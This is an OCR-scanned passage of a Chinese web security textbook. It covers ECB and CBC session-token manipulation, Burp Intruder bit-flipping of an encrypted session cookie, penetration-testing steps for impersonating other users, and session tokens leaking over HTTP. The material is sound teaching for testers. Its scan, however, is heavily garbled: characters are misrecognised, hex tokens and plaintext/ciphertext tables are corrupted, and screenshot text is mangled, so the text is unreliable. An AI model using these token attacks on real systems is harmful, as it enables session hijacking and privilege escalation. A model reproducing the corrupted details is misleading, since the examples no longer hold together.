ydd;time B6B970C47BA2E249 
=6344304 AO0670592D74BCDO7Y 
23694715 DS51A3E1SOEFC2E69 
OOO 1 885A5C8131E4210F 





现在 ， 加 密 的 令 牌 中 包含 一 个 经 过 修改 的 uidq 信 ， 以 及 一 个 复制 的 app 值 。 具 体会 出 现 什么 








情况 ,将 取决 于 应 用 程序 如 何 处 理 加 密令 牌 。 通 常 ， 以 这 种 方式 使 用 令 牌 的 应 用 程序 仅 检查 加 密 
令 牌 的 某 些 部 分 ， 如 用 户 标识 符 。 如 果 应 用 程序 这 样 处 理 令 牌 那么, 应 用 程序 将 处 理 uia 为 992 
( 而 不 是 最 初 的 218 ) 的 用 户 的 请 求 。 
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上 述 攻击 能 否 奏效 ， 取决 于 你 在 操纵 分 组 时 ， 应 用 程序 是 否 发 布 一 个 令 牌 ,在 其 中 包含 与 有 
效 的 uia 值 对 应 的 rna 值 。 另 一 种 更 加 可 靠 的 攻击 方法 ， 是 以 适当 的 偏 移 值 注册 一 个 包含 数值 的 
用 户 各， 并 复制 该 分 组 以 替换 现 有 的 uia 值 。 假 设 你 注册 用 户 和 名 aaf1， 并 且 应 用 程序 发 布 以 下 
仿 牌 : 
93A5A47BF93B23B6603708F93DEAD67C7F4C76FF3D6C6E6A7B9CBS8FCA48S6F9E11922A5BC430A 
73B38C14BD223FO003A8303DDF2Z93A5A6FODCO6C539305B252366F5F4684CODZ2BBBB0O8BD834BB 

















然后 ， 如 果 将 第 七 个 分 组 复制 到 第 四 个 分 组 之 后 ， 加 密令 牌 将 包含 uidq 值 1: 


ADEBCOT7TFFES87819D 
该 令 牌 的 明文 分 组 和 密 文 分 组 如 下 所 示 : 

rnd=9224 9A5A47BF9B3B6603 
856;app= TO08F9DEAD67C7FAC 
iTradeEU 76FE3D6C6E6RA7B9C 
R_1;uid= BS8FCAA86F9E11922 
219;usSer A5BC430A73B38C14 
name=dat BD223F003A8309DD 
1 ;time=6 F29A5A6FODCO6C53 
34430503 305B5366F5F4684C 
61065250 0D2BBBBO8BD834BB 
QO: ADEBCOTFFE87819D 


rnd=9224 9A5A47BF9B3B6603 
856;app= 708F9DEAD67C7EF4CGC 
ITYradeEU 76PFPF3D6C6E6A7B9C 
R_1;uid= B8FCA486F9BE1L1922 
1;time=6 F29A5A6FODCO6C53 
219;uSer ADSBC430A73B38C14 
name=daf BD223F003A8309DL 
1;time=6 F29A5A6FODCO6C53 
34430503 9305B5366F5FE4684C 
61065250 0D2BBBBO8BD834BB 
OO; ADEBCOT7TFFE87819D 





通过 注册 适当 范围 的 用 户 名 并 重新 实施 这 个 攻击 ， 你 就 可 以 循环 使 用 所 有 有 效 的 uia 值 ， 从 
而 伪 痿 成 每 一 个 应 用 程序 用 户 。 


尝试 访问 


http://mdsec.net/auth/363/ 





2. CBC 密 码 

鉴于 ECB 密 码 存在 明显 的 缺陷 , 于 是 人 们 开发 出 了 密码 块 链 ( CBC ) 密码 ,使 用 CBC 密 人 码 时 ， 
在 加 密 每 个 明文 分 组 之 前 ， 将 它 与 前 一 个 密 文 分 组 进行 XOR 运 算 ， 如 图 7-5 所 示 。 这 样 ， 同 一 个 
明文 分 组 就 不 会 被 加 密 成 同一 个 密 文 分 组 。 解密 时 逆 疝 执行 XOR 运 算 , 每 个 解密 的 分 组 将 与 前 一 
个 密 文 分 组 进行 XOR 运 算 ， 以 恢复 原始 的 明文 。 
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由 于 使 用 CBC 密 人 码 可 以 避免 使 用 ECB 密 人 码 造 成 的 某 些 问 题 ,， 因此 ，CBC 模 式 经 常 使 用 标准 对 
称 加 密 算法 ， 如 DES 和 AES。 但 是 ， 由 于 Web 应 用 程序 经 常 使 用 CBC 加 密 的 令 牌 ， 这 意味 着 攻击 
者 不 需要 了 解密 钥 就 可 以 操纵 解密 令 牌 的 某 些 部 分 。 


明文 明文 明文 
EETETIENY EEDEREEE 男 面 而 图 国 而 而 图 


倪 始 化 癌 量 
E> 
窗 钥 一 >>| 分 组 密码 加 密 | | 窑 销 一 | 2 密 钥 一 | 分 组 密码 加 密 











国 面 画面 画图 加 加 闻 回 国 轩 清国 大 图 LLLLLLLD 
密 文 密 文 密 文 





图 7-5 ”使 用 CBC 密 码 时 ， 在 加 密 每 个 明文 分 组 之 前 ， 将 它 与 前 一 个 密 文 分 组 进行 XOR 运 算 


下 面 我 们 对 上 一 个 包含 儿 个 不 同 的 有 意义 组 件 ( 包括 一 个 数字 用 户 标 识 符 ) 的 应 用 程序 令 牌 
稍 做 修改 : 

rnd=191432758301;app=eBankProdTC;uid=216;time=6343303; 

和 前 面 一 样 ， 加 密 这 段 信息 后 ， 将 生成 一 个 明显 无 意义 的 令 牌 : 


bUFB1TFTAFEB4C874E695AAFC9AA4C2263D3E8E66PBBA9B2829B173F255D447C51321586257C 
6E459A93635636F45D7B1A43163201477 


由 于 这 个 令 牌 是 使 用 CBC 密 人 码 加 密 的 ， 因 此 , 在 解密 该 令 牌 时 , 将 对 每 个 密 文 分 组 与 下 一 个 
解密 的 文本 块 进行 XOR 运 算 ， 以 获得 明文 。 现 在 ， 如 果 攻 击 者 修改 密 文 (他 收 到 的 令 牌 ) 的 某 些 
部 分 , 将 导致 特定 的 分 组 被 解密 成 乱码 。 但是， 这 也 导致 下 一 个 解密 的 文本 块 将 与 不 同 的 值 进行 
XOR 运 算 ， 从 而 生成 经 过 修改 但 仍 有 意义 的 明文 。 换言之 , 通过 操纵 令 牌 中 的 某 个 分 组 ,攻击 者 
能 够 修改 它 之 后 的 分 组 的 解密 内 容 。 如 果 应 用 程序 以 危险 的 方式 处 理 生 成 的 解密 令 牌 , 攻击 者 将 
能 够 切换 到 其 他 用 户 或 提升 自己 的 权限 。 

为 什么 会 出 现 这 种 情况 呢 ? 在 上 述 示例 中 , 攻击 者 对 加 人 密 的 令 牌 进行 修改 , 每 次 以 任意 方式 
更 改 一 个 字符 ， 并 将 修改 后 的 令 牌 发 送 给 应 用 程序 。 在 这 个 过 程 中 ,攻击 者 会 提出 大 量 请 求 。 应 
用 程序 对 每 个 修改 后 的 令 牌 进行 解密 后 生成 的 部 分 值 如 下 所 未 : 

77737373???732858301;app=eBankProdTC;uid=216;time=6343303; 

77773377?732758321;app=eBankProdTC;uid=216;time=6343303; 
rnd=1914?3???????;aqp=eBankProdTC;uid=216;time=6343303; 
rnd=19147????7????;app=eAankProdTC;uid=216;time=6343303; 
rnd=191432758301????????nkPqodTC;uid=216;time=6343303; 
rnd=191432758301????????nkProdUC;uid=216;time=6343303: 
rnd=191432758301;app=eBa?????7??7?7;Uie-216;time=6343303;， 
rnd=191432758301;app=eBa????????;Uid-226;time=6343303: 
rnd=191432758301;app=eBankProdTC??????7??7;timd=6343303;， 
rnd=191432758301;app=eBankProdTC??????7??;time=6343503， 
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在 每 一 个 值 中 ， 如 我 们 预料 的 那样 ， 攻 击 者 修改 的 分 组 被 解密 成 乱码 ( 以 ?2??????? 表 示 )。 
但 是 ， 之 后 的 分 组 被 解密 成 有 意义 的 文本 ， 只 是 与 原始 令 牌 略 有 不 同 。 如 前 所 述 ， 出 现 这 种 不 
同 ， 是 因为 解密 的 文本 与 前 一 个 密 文 分 组 进行 了 XOR 运 算 ， 而 攻击 者 已 对 该 密 文 分 组 进行 了 略 
微 修改 。 

虽然 攻击 者 看 不 到 解密 的 值 , 但 应 用 程序 会 尝试 处 理 这 些 值 ， 随后 攻击 者 会 在 应 用 程序 的 响 
应 中 看 到 人 处理 结果 。 具 体 米 说, 接 下 来 会 出 现 什么 情况 ,取决 于 应 用 程序 如 何人 处 理 经 过 修改 的 解 
密令 牌 。 如 果 应 用 程序 拒绝 包含 任何 无 效 数据 的 令 牌 ,攻击 将 会 失败 。 但 是 ， 以 这 种 方式 使 用 令 
牌 的 应 用 程序 通常 仅 查 看 解密 令 牌 的 某 些 部 分 ， 如 用 户 标识 符 。 如 果 应 用 程序 这 样 处 理 令 牌 , 那 
么 ， 上面 列表 中 的 第 八 个 分 组 将 能 够 成 功 实 施 攻击 , 应 用 程序 将 处 理 攻 击 者 提出 的 请 求 ， 并 认为 
用 户 的 uia 为 226， 而 不 是 最 初 的 216。 

使 用 Burp Intruder 中 的 “位 翻转 程序 ”( bit flipper ) 有 效 载 集 类 型 ， 可 以 轻松 测试 出 应 用 程序 
是 否 存 在 这 方面 的 漏洞 。 首 先 ， 需要 使 用 你 自己 的 账户 登录 应 用 程序 。 然 后 ， 找 到 一 个 使 用 已 登 
录 会 话 并 在 响应 中 显示 已 登录 用 户 标 识 符 的 应 用 程序 页 面 ,通常 是 用 户 的 “ 主 登录 ”页 或 “账户 
详细 资料 ”页 。 图 7-6 显 示 了 如 何 将 Burp Intruder 设 置 为 针对 用 户 的 主页 ， 其 中 的 加 密会 话 令 牌 被 
标记 为 有 效 载 集 位 置 。 



























































而 = 二 = 
DRE ey) 2 Ct Sy 3 EY 
$ burp suite professional ， 

burp intruder repeater Window help 


| proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts | 








target 


| 


target | positions | payloads | options | 























attack type |sniper ww 
1 payload position 


GET /auth/365/Home.ashx HTTP/1.1 全 | 
Host: mdsec.net 


length- 569 





User-Agent: Hozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) 
Gecko/20100722 Firefox/3.6.8 


Accept: text/html,application/xhtml+xml,application/xml;d=0.9,*/*;cd=0.8 


. lb) 


Accept-Language: en-gb,en;dq=0.5 
Accept-Encodsng: gz2ipsdeflate 

Accept-Charset: ISO-8859-1,utf-B8;dq=0.7,*;d=D." 
Keep-Alive: -15 

Connection: keep-alive 








Referer: https://mdsec.net/auth/365/ 

Cookie: 

SessionId=§D81ASBS878F2F903A454B9EFS1DA9E2 1€F3CAEE20493CCCFSATEODOEFSEFSAOT? 
EE40EF AEé€7317"CABCB2BCDODS8BS35978143BEAAIEBES4541E7CE4F729EDCCCFAD139§ 





Iv 





一 一 





| 0matches 




















图 7-6 将 Burp Intruder 配 置 为 修改 加 密会 话 令 牌 


所 需 的 有 效 载荷 配置 如 图 7-7 所 示 。 它 指示 Burp 处 理 令 牌 的 原始 值 , 将 其 视 为 ASCII 编 码 的 十 
六 进 制 代 码 ， 并 “翻转 ”每 个 字符 位 置 的 每 个 数据 位 。 这 种 方法 非 第 理想 ， 因 为 只 需要 提交 较 小 
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数量 的 请 求 〈 令 牌 中 的 每 个 字 世 8 个 请 求 )， 并 且 几 乎 总 是 能 够 确定 应 用 程序 是 否 易于 受到 攻击 。 
这 样 就 可 以 采用 更 有 针对 性 的 攻击 ， 对 应 用 程序 的 漏洞 加 以 利用 。 





区 burp suite professional 攻 [区 司 


burp intruder repeater Window help 








| target | proxy | spider scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts | 
租 :、 [| 


target positions | payloads options | 























number of payloads: Unknown 


number of requests unknown 








payload set |1 [=| | bit fipper [x 





®) operate on base value of payload position 


JJ Operate on string 


; operate on literzl value 


@) treat as ASCI hex 


select bits to flip 








| 10sb) [wj 3 


Pa 4 6 I] 8 (msh) 





payload processing rules 


ee 





ls {SIDS sa 



































图 7-7 将 Burp Intruder 配 置 为 “翻转 ”加 密令 牌 中 的 每 个 位 


实施 攻击 时 , 最 初 的 请 求 并 不 会 导致 应 用 程序 的 啊 应 产生 任何 明显 的 变化 , 用 户 的 会 话 也 未 
遭 到 修改 。 这 本 刁 就 值得 我 们 注意 ,因为 这 表示 令 牌 的 第 一 部 分 并 未 用 于 确定 登录 用 户 。 攻 击 过 
程 中 随后 提交 的 许多 请 求 导 致 应 用 程序 重 定 加 到 登录 页 面 ， 这 说 明 所 做 的 修改 已 导致 令 牌 失效 。 
关键 在 于 ,还 存在 一 些 请 求 ， 其 啊 应 似乎 是 有 效 会 话 的 一 部 分 , 但 实际 上 与 原始 的 用 户 标 识 符 无 
天。 这 些 请 求 与 包含 uid 的 令 牌 分 组 对 应 。 某 些 情 况 下 ， 应 用 程序 仪 显示 “未 知 用 户 ”， 表 未 经 
过 修改 的 uid 没 有 对 应 的 实际 用 户 ， 因 此 攻击 将 会 失败 。 其 他 情况 下 ， 应 用 程序 会 显示 其 他 注册 
用 户 的 名 称 , 这 说 明 攻 击 已 取得 成 功 。 攻击 结果 如 图 7-8 所 示 。 我 们 在 其 中 定义 了 一 个 “提取 grep” 
列 来 显示 登录 用 户 的 标识 待 ， 并 设置 过 滤 需 来 隐藏 将 应 用 程序 重 定 回 到 登录 页 面 的 啊 应 。 

确定 存在 的 漏洞 后 就 可 以 通过 更 有 针对 性 的 攻击 来 利用 该 漏洞 。 为 此 ， 需 要 从 结果 中 确定 ， 
如 果 用 户 的 资料 发 生变 化 ， 加 密令 有 牌 中 的 哪个 数据 块 会 发 生变 化 。 然后, 再 实施 攻击 以 测试 这 个 
数据 块 中 的 其 他 值 。 这 时 ， 可 以 使 用 Burp Intruder 中 的 “数字 ”有 效 载 傈 类 型 。 


尝试 访问 


http://mdsec.net/auth/365/ 
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attack save columns 


Filter: hiding 3 responses 


results | target | positions | payloads | options 
request payload commen: 
164 Daf. 
165 Daf. 
Daf. 











-二 一 上 十 


| Daf. 

Daf. 

| unknown user. 

| unknown USer. 
Unknown user. 











四 四 四 回 回 口 


| 
二 el 





el 


二 





| John Herman. 
| Unknown user. 
| unknown user. 















































:有 加 | 轩 jEJEJEJE] 








<imd align="absmiddle" src="home.png">Enbhsp;Logged in as: Peter 
Weinerl|. <br><hr><a href="MyDetails.ashx">Your details</a><br><a 
href="Chandgefassword.ashx">Change password</a><br><a 
href="Logout .ashx">Logout</a><br></body></html> 


| 0matches 


nished 








图 7-8 ”攻击 加 密令 牌 的 成 功 “位 翻转 ”攻击 


注解 ”一 些 应 用 程序 经 常 加 密 请 求 参 数 中 的 有 意义 数据 (如 商品 的 价格 )， 以 防止 攻 
南 者 自 改 这 些 数 据 。 如 果 加 窗 数 据 明显 在 应 用 程序 的 功能 中 发 挥 着 重要 作用 ， 这 时 应 





尝试 实施 “位 翻转 ”攻击 ， 看 是 否 能 够 以 有 意义 的 方式 操纵 加 密 信息 ， 从 而 达到 破坏 
应 用 程序 逻辑 的 目的 。 











当然 , 利用 本 市 所 述 的 源 洞 的 主要 目的 是 伪 泪 成 其 他 应 用 程 订 用 户 一 一 最 好 是 拥有 较 噩 权限 
的 管理 用 户 。 如 采 只 能 育 目 修改 加 密令 牌 的 某 些 部 分 , 则 攻击 能 否 取得 成 功 ,只 能 靠 运气 。 但 是 ， 
菏 些 情况 下 ， 应 用 程序 可 能 会 为 你 提供 一 些 “ 提 示 ”。 如 末 应 用 程序 采用 对 称 加 密 防 止 用 户 自 改 
数据 ， 则 通常 整个 应 用 程序 都 会 使 用 相同 的 加 密 算 法 和 密 钥 。 在 这 种 情况 下， 如 果 应 用 程序 的 任 
何 功 能 向 用 户 披 露 了 任意 加 密 字 符 串 的 解密 值 ， 则 可 以 利用 这 一 “提示 ”完全 解密 任何 受 保护 的 
信息 。 

以 笔者 发 现 的 一 个 提供 文件 上 传 /下 载 功 能 的 应 用 程序 为 例 。 上 传 文件 后 ， 用 户 将 获得 一 个 
包含 文件 名 参数 的 下 载 链 接 。 为 防止 修改 文件 路 径 的 各 种 攻击 , 应 用 程序 对 这 个 参数 中 的 文件 名 
进行 加 密 。 但 是 ， 如 果 用 户 请 求 一 个 已 删除 的 文件 ,应 用 程序 将 显示 一 条 错误 消息 ,在 其 中 显示 
所 请 求 文 件 的 解密 名 称 。 攻击 者 对 这 种 行为 加 以 利用 就 可 以 确定 应 用 程序 使 用 的 任何 加 密 字 符 中 
的 明文 值 ， 包括 会 话 令 牌 的 值 。 笔 者 发 现 , 该 应 用 程序 的 会 话 令 牌 包含 各 种 有 意义 的 值 ( 具有 结 
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构 化 的 格式 )， 因 此 ， 兄 于 受到 本 市 所 述 的 各 种 攻击 。 由 于 这 些 值 属于 文本 格式 的 用 户 名 和 应 用 
程序 角色 ， 而 不 是 数字 标识 待 ， 因 此 ， 仅 仅 使 用 让 目的 位 翻转 很 难 对 其 实施 成 功 的 攻击 。 但 是 ， 
通过 使 用 文件 名 解密 函数 就 可 以 在 查看 结 来 的 同时 , 对 令 脾 的 数据 位 进行 系统 地 修改 。 这样 就 可 
以 构造 一 个 令 牌 ， 该 令 牌 一 旦 解密 将 指定 有 效 的 用 户 和 管理 角色 ， 从 而 完全 控制 整个 应 用 程序 。 























注解 ”还 可 以 使 用 其 他 技巧 来 解 禾 应 用 程序 使 用 的 加 窖 数据 。 例 如 ， 利 用 一 个 “揭示 
性 ”加 密 提 示 (“reveal”encryption oracle ) 可 获得 加 密令 牌 的 明文 值 。 虽然 在 解密 密码 
时 ， 这 可 能 是 一 个 重要 的 汤 洞 ， 但 是 ， 解 帘 会 话 令 牌 并 不 会 使 攻击 者 能 够 立即 攻破 其 
他 用 户 的 会 话 。 不 过 ， 解 密令 牌 有 助 于 攻击 者 了 解 明文 的 结构 ， 帮 助 他 们 实施 针对 性 


的 “位 翻转 ”攻击 。 有 关 “ 揭 示 ” 加 密 提 示 攻 击 的 详细 信息 ， 请 参阅 第 11 草 。 
针对 填充 提示 ( padding oracle ) 的 穷 路 攻击 可 用 于 破解 加 密令 牌 。 请 参阅 第 18 草 
了 解 详细 信息 。 


渗透 测试 步骤 

许多 时 候 , 在 应 用 程序 采用 加 密令 牌 时 ， 有 具体 的 攻击 方法 可 能 要 取决 于 各 种 因素 , 包括 分 
组 边界 相对 于 攻击 的 数据 的 俩 移 值 , 以 及 应 用 程序 是 否 人 允许 修改 明文 的 结构 。 完 全 下 目地 开始 
攻击 将 很 难 实施 有 效 的 攻击 ,但 在 许多 情况 下 ， 这 种 攻击 也 可 能 会 奏效 。 

(1) 除非 会 话 令 牌 明显 有 意义 或 本 吴 是 连续 的 ， 否 则 应 始终 考虑 令 牌 被 加 密 的 可 能 性 。; 
币 ， 通 过 注册 几 个 不 同 的 用 户 名 , 并 在 用 户 名 中 每 次 染 加 一 个 字符 ,就 可 以 确定 应 用 程序 是 
采用 分 组 密码 。 如 采 活 加 一 个 字符 会 导致 会 话 令 牌 的 长 度 增加 8 或 16 个 字 人 ， 这 次 明 应 用 程 
可 能 使 用 的 是 分 组 密码 。 要 确认 这 一 点 , 可 以 继续 在 用 户 名 中 添加 字 节 ,看 随后 会 话 令 牌 是 
会 同样 增加 8 或 16 个 字 节 。 

(2) 通 遂 ， 在 育 目 的 情况 下 ， 很 难 确定 并 利用 ECB 密 码 操纵 独 洞 。 但 是 ， 可 以 答 试 育 目 地 
复制 并 移动 令 牌 中 的 密 文 分 组 , 并 查看 能 否 能 够 以 目 己 的 用 户 账 户 或 其 他 用 户 账 户 登 录 应 用 程 
序 ， 或 根本 无 法 登录 应 用 程序 。 

(3) 你 可 以 通过 使 用 “位 翻转 ”有 效 载 傈 源 对 整个 令 牌 实施 Burp Intruder 攻 击 ， 测 试 应 用 程 
序 是 否 存在 CBC 密 人 码 操 纵 漏 洞 。 如 于 位 翻转 确定 了 令 牌 中 的 茶 个 部 分 , 并 且 修 改 该 部 分 后 仍然 
能 够 以 其 他 用 户 或 不 存在 的 用 户 映 份 访问 有 效 会 话 , 那么 ,攻击 者 可 以 扩大 攻击 范围 ， 对 这 个 
部 分 中 的 每 个 值 进行 测试 ， 以 实施 更 有 和 针对 性 的 攻击 。 

(4) 在 上 述 两 种 攻击 过 程 中 ， 监 视 应 用 程序 的 啊 应 ,确定 与 提交 的 每 个 请 求生 成 的 会 话 有 
关 的 用 户 ， 并 尝试 利用 任何 机 会 来 提升 日 己 的 权限 。 

(5) 如 条 攻击 并 未 万 效 ,， 但 通过 步 嗓 1 得 项 ,攻击 者 提交 的 长 度 可 变 的 输入 已 被 合并 到 令 牌 
中 ,这 时 , 应 答 试 每 次 增加 一 个 字符 ， 直 到 达到 所 使 用 的 分 组 的 大 小 ， 以 生成 一 系列 令 牌 。 然 
后 ， 对 于 每 个 生成 的 令 牌 ， 应 执行 步 又 (2) 和 步 嗓 (3)。 这 将 增加 需要 修改 的 数据 恰好 与 分 组 边 
界 对 齐 的 机 率 ， 带 助 你 实施 成 功 的 攻击 。 
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7.3 会 话 令 牧 处 理 中 的 溥 弱 环 市 


不 管 应 用 程序 如 何 确保 它 生 成 的 令 牌 不 包含 任何 有 意义 的 信息 ， 并 且 很 难 加 以 分 析 或 预测 ， 
但 如 宁 生 成 令 牌 后 不 对 其 小 心 处 理 , 它 的 会 话机 制 仍然 兄 于 受到 各 种 攻击 。 例 如 ， 如 采 以 茶 种 方 
式 将 令 牌 透露 给 攻击 者 ， 那 么 即使 攻击 者 无 法 预测 令 牌 ， 也 仍然 能 够 劫持 用 户 的 会 话 。 

应 用 程序 以 不 安全 的 方式 处 理 令 牌 ， 致 使 令 牌 易于 遭受 多 种 攻击 。 














局 错误 观点 “ “因为 使 用 SSL， 所 以 我 们 的 令 牌 十 分 安全 ， 不 会 泄露 给 第 三 方 ， 
正确 使 用 SSL 确 实 有 助 于 防止 会 话 令 牌 被 拦截 。 但 是 ， 即 使 采用 SSL， 我 们 犯 下 的 
各 种 错误 仍然 可 导致 令 牌 以 明文 形式 传输 。 因 此 ， 攻 击 者 可 对 终端 用 户 实 施 各 种 直接 


攻击 ， 获 得 他 们 的 令 牌 。 


© 错误 观点 “我 们 的 令 牌 由 采用 成 熟 、 可 靠 加 密 技术 的 平台 生成 ， 因 此 不 可 能 被 攻破 。” 
默认 情况 下 , 应 用 程序 服务 器 会 在 用 户 初次 访问 站 点 时 创建 一 个 会 话 cookie, 并 将 
此 cookie 用 于 用 户 与 站 点 的 所 有 交互 。 我 们 在 下 面 的 章节 中 将 讲 到 , 这 可 能 会 导致 令 牌 

处 理 方面 的 各 种 安全 漏洞 。 





7.3.1 在 网 络 上 泄露 令 牌 


如 果 通 过 网 络 以 非 加 蜜 方式 传送 会 话 令 牌 ,就 会 产生 这 方面 的 漏洞 ， 人 允许 处 在 适当 位 置 的 禾 
听 者 能 够 截获 令 牌 并 因此 伪装 成 合法 用 户 。 份 听 的 适当 位 置 包括 用 户 的 本 地 网 络 、 用 户 所 在 的 IT 
部 门 、 用 户 的 ISP、 因 特 网 骨干 网 、 应 用 程序 的 ISP 和 运行 应 用 程序 组 织 的 IT 部 门 。 处 在 上 述 任何 
一 个 位 置 ， 相 关 组 织 的 授权 人 员 和 任何 攻破 相关 基础 架构 的 外 部 攻击 者 都 可 以 截取 会 话 令 牌 。 

在 最 简单 的 情形 中 ， 应 用 程序 使 用 一 个 非 加 密 的 HTTP 连 接 进 行 通信 。 这 使 攻击 者 能 够 拦截 
客户 端 和 服务 器 间 传 送 的 所 有 数据 ,包括 登录 证 书 、 个 人 信息 、 支 付 细节 等 。 这 时 ， 攻 击 者 通常 
不 必 攻 击 用 户 的 会 话 ， 因 为 攻击 者 已 经 可 以 查阅 特权 信息 ,并 能 够 使 用 截获 的 证 书 登录 ， 从 而 执 
行 其 他 恶意 操作 。 然 而 ， 有 些 时 候 ， 用 户 的 会 话 仍然 是 攻击 者 的 主要 攻击 目标 。 例如， 如 有 果 截 获 
的 证 书 不 足以 执行 第 二 次 登录 (如 银行 应 用 程序 可 能 要 求 登 录 者 提交 在 不 断 变化 的 物理 令 牌 上 显 
示 的 一 串 数 字 , 或 者 用 户 PIN 号 码 中 的 几 个 特殊 数字 ), 这 时 攻击 者 如 果 想 执行 任意 操作 ， 就 必须 
支持 他 穷 听 的 会 话 。 或 者 如 果 登 录 机 制 实施 严格 的 审查 ,并且 在 每 次 成 功 登 录 后 通知 用 户 ， 那么 
攻击 者 可 能 希望 避免 自己 登录 ， 以 尽 可 能 保持 活动 的 隐秘 性 。 

在 其 他 情况 下 ， 使 用 HTTPS 保 护 关 键 客户 端 - 服 务 需 通信 的 应 用 程序 的 会 话 令 牌 仍然 可 能 在 
网 络 上 遗 到 拦截 。 这 种 薄弱 环 厄 表现 形式 各 异 , 其 中 有 许多 可 能 发 生 在 应 用 程序 使 用 HTTP cookie 
作为 会 话 令 牌 传输 机 制 时 。 

口 一 些 应 用 程序 在 登录 阶段 选择 使 用 HTTPS 保 护 用 户 证 书 的 安全 ,但 在 用 户 会 话 的 其 他 阶 

段 转 而 使 用 HTTP。 许 多 Web 邮 件 应 用 程序 以 这 种 方式 运作 。 在 这 种 情况 下 ， 究 听 者 无 法 
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拦截 用 户 的 证 书 , 但 仍然 可 以 截获 会 话 令 牌 。Firefox 的 插件 Firesheep 工 具 会 让 这 一 过 程 变 
得 轻而易举 。 

D 一 些 应 用 程序 在 站 点 中 预先 通过 验证 的 区 域 (如 站 点 首页 ) 使 用 HTTP， 但 从 登录 页 面 开 
始 转换 到 HTTPS。 然 而 ， 许 多 时 候 ， 应 用 程序 在 用 户 访问 第 一 个 页 面 时 就 给 他 发 布 一 个 
会 话 令 牌 ， 并 且 在 用 户 登 录 时 也 不 修改 这 个 令 牌 。 最 初 并 未 通过 验证 的 用 户 会 话 在 登录 
后 却 被 升级 为 通过 验证 的 会 话 。 在 这 种 情况 下 ， 窜 听 者 就 可 以 在 登录 前 拦截 用 户 的 令 牌 ， 
等 待 用 户 转 换 到 HTTPS 进 行 通信 (表示 用 户 正 在 登录 ) 然后 尝试 使 用 那个 令 牌 访问 一 个 
受 保护 的 页 面 ( 如 “我 的 账户 ”)。 

口 即使 应 用 程序 在 用 户 成 功 登 录 后 发 布 一 个 新 令 牌 , 并 从 登录 页 面 开 始 使 用 HTTPS, 但 是 ， 
如 果 用 户 通 过 单 击 验 证 区 域 中 的 一 个 链接 、 使 用 “后 退 ” 按 钮 或 者 直接 输入 URL， 重 新 
访问 一 个 预先 验证 的 页 面 ( 如 “帮助 ”或 “关于 ”页 面 )， 用 户 通过 验证 的 会 话 令 牌 仍 有 

口 与 前 面 的 情况 稍 有 不 同 ， 应 用 程序 可 能 在 用 户 单 击 登录 链接 后 转换 到 HTTPS。 然 而 ， 如 
果 用 户 对 URL 进 行 相应 修改 ， 应 用 程序 仍然 接受 通过 HTTP 进 行 登录 。 这 时 ， 处 在 适当 位 
置 的 攻击 者 就 可 以 修改 站 点 预先 通过 验证 的 区 域 返 回 的 页 面 ， 使 登录 链接 指向 一 个 HTTP 
页 面 。 即 使 应 用 程序 在 用 户 成 功 登录 后 发 布 一 个 新 令 牌 ， 如 采 攻 击 者 已 成 功 将 用 户 的 链 
接 降 级 为 HTTP， 他 仍然 能 够 拦截 这 个 令 牌 。 

口 一 些 应 用 程序 对 应 用 程序 内 的 全 部 静态 内 容 ( 如 网 像 、 脚 本 、 样 式 表 和 页 面 模板 ) 使 用 
HTTP。 如 果 出 现 这 种 行为 , 用 户 的 浏览 需 将 显示 一 条 警告 消息 ， 如 图 7-9 所 示 。 当 浏览 必 
显示 此 警告 时 ， 它 已 经 通过 HTTP 获 取 了 相关 数据 项 ， 因 而 已 经 传送 了 会 话 令 牌 。 浏 览 3 
显示 警告 是 为 了 让 用 户 拒 绝 处 理 已 通过 HTTP 接 收 到 并 因此 可 能 受到 污染 的 响应 数据 。 如 
前 所 述 ， 如 果 用 户 的 浏览 希 通 过 HTTP 访 问 一 个 资源 ， 并 使 用 这 个 令 牌 通过 HTTPS 访 问 站 
点 中 受 保护 的 非 静 态 区 域 ， 攻 击 者 就 能 拦截 该 用 户 的 会 话 令 牌 。 


Security Warning [ES 




























































































总 Do you want to view only the webpage content that was delivered 
securely? 


This webpage contains content that will not be delivered using a secure HTTPS 
connection, which could compromise the security of the entire webpage. 


| Moreinfo | Ed he 














图 7-9 ”如 果 一 个 通过 HTTPS 访 问 的 页 面包 含 通 过 HTTP 访 问 的 数据 ， 浏 览 需 将 
显示 一 条 警报 消息 


口 即使 应 用 程序 在 每 一 个 页 面 (包括 站 点 中 未 通过 验证 的 区 域 和 静态 内 容 ) 都 使 用 HTTPS， 
有 些 情况 下 ， 用 户 的 令 牌 仍然 通过 HTTP 传 送 。 如 果 攻 击 者 能 够 以 某 种 方式 诱 使 用 户 通 过 
HTTP 提 出 一 个 请 求 (或 者 是 请 求 相同 服务 器 上 运行 的 HTTP 服 务 ， 或 者 是 访问 http:// 
server:443/ ), 那么 用 户 就 可 能 在 这 个 过 程 中 提交 令 牌 。 这 时 ,攻击 者 可 以 采用 的 攻击 
手段 包括 在 一 封 电子 邮件 或 即时 消息 中 给 用 户 发 送 一 个 URL , 在 他 控制 的 一 个 Web 站 点 中 
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插入 一 个 自动 加 载 的 链接 ,或 者 使 用 可 单 击 的 横幅 广告 。( 请 参阅 第 12 革 和 第 13 章 了 解 使 
用 这 种 技巧 对 其 他 用 户 实施 攻击 的 证 细 内 容 。) 








渗透 测试 步 双 











(1) 以 正 第 方式 访问 应 用 程序 ， 从 第 一 个 进入 点 (“起 始 ”URL ) 开始 ， 接 着 是 登录 过 程 ， 
然后 是 应 用 程序 的 全 部 功能 。 记录 每 一 个 被 访问 的 URL 以 及 收 到 新 会 话 令 有 牧 的 每 种 场合 。 特别 





注意 登录 功能 及 HTTP 与 HTTPS 通 信之 间 的 转换 。 可 以 使 用 网 络 嗅 探 名 〈 如 Wireshark ) 手动 或 
使 用 拦截 代理 服务 硕 中 的 日 志 功 能 部 分 上 自动 完成 这 一 任务 ， 如 图 7-10 所 示 。 
EITTIIOTTITTTI 二 











hurp intruder repeater window help 












































| proxy | Spider | intruder | repeater | comms | alerts 
intercept options | history | 
| target |method| URL _ | pe | sstL | Ip | status | length | | 
i. bloyyer.com:80 IGET 人 族 | | 癌 |66.102.15.100 |302 |461 IN8cC cmphhfs-fu=0ai402010050 |a|| 
www.bloggercom:80 IGET listat | | EE 66.102.15.100 |200 |20,532 |JSESSIONID=E86731C7CFF0B2F9300| 
Wdl: 下 licssiblogder.css [CSS 66.102.15.100 |200 11.04 NSC cmphhfs-fyu=0a1402010050 | 
